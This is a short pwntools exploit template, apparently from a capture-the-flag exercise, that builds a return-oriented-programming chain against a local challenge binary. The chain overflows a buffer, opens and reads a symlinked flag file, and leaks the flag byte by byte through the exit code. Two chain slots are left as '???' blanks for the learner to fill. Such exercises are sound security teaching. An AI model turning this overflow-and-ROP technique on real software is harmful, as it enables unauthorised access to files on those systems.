#!/usr/bin/env python
import os
from pwn import *

try:
    # 0x400020 --> `@`
    os.symlink('flag', '@')
except:
    pass

# global variable segment (wr permission.)
global_var = 0x602100

e= ELF("./get-flag-without-write-nor-exec")
open_plt = e.plt['open']
read_plt = e.plt['read']
exit_plt = e.plt['exit']

rdi_ret = 0x400d93
rbp_ret = 0x400940
rsi_r15_ret = 0x400d91


flag = ''

# building `flag`
while (not flag) or (flag[-1] != '}') :
    p = process(e.path)
    p.sendline("4")  # choosing item `4`

    print(p.recv().decode('utf-8'))

    # buf length
    buf = b"A" * 24

    # open
    buf += p64(rdi_ret)
    buf += p64(0x400020)  # `@` character
    buf += p64(rsi_r15_ret)
    buf += p64(0)
    buf += p64(0)
    buf += p64(open_plt)

    # read
    buf += ???
    buf += p64(read_plt)

    # set rbp as target_addr + 4
    buf += p64(rbp_ret)
    buf += ???
    buf += p64(exit_plt)


    p.sendline(buf)
    p.wait()
    ret = p.poll()
    flag += chr(ret)
    p.close()

print(flag)